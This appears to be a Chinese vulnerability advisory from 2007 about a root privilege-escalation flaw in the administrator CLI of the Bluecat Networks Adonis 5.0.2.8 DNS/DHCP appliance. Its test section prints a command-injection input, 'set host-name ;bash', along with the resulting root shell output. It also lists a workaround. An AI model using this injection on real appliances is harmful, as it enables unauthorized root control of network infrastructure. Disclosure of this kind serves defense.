发布日期：2007-08-16
更新日期：2007-08-17

受影响系统：

Bluecat Networks Adonis 5.0.2.8

描述：

---

BUGTRAQ  ID: 25342

Adonis是企业级的硬件DNS/DHCP管理设备。

Adonis设备对命令行请求的处理上存在漏洞，本地攻击者可能利用此漏洞控制设备。

如果在Adonis设备的管理员帐号所提供的CLI输入某个命令序列的话，就可能允许管理员以root用户权限执行命令。

<*来源：forloop
  
  链接：http://marc.info/?l=bugtraq&m=118729341301031&w=2
        http://secunia.com/advisories/26495/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

:adonis>set host-name ;bash
    adonis.katter.org
    root@adonis:~# id
    uid=0(root) gid=0(root) groups=0(root)

建议：

---

临时解决方法：

* 仅为可root访问设备的管理员提供管理员帐号。

厂商补丁：

Bluecat Networks
----------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.bluecatnetworks.com/

浏览次数：2556
严重程度：0（网友投票）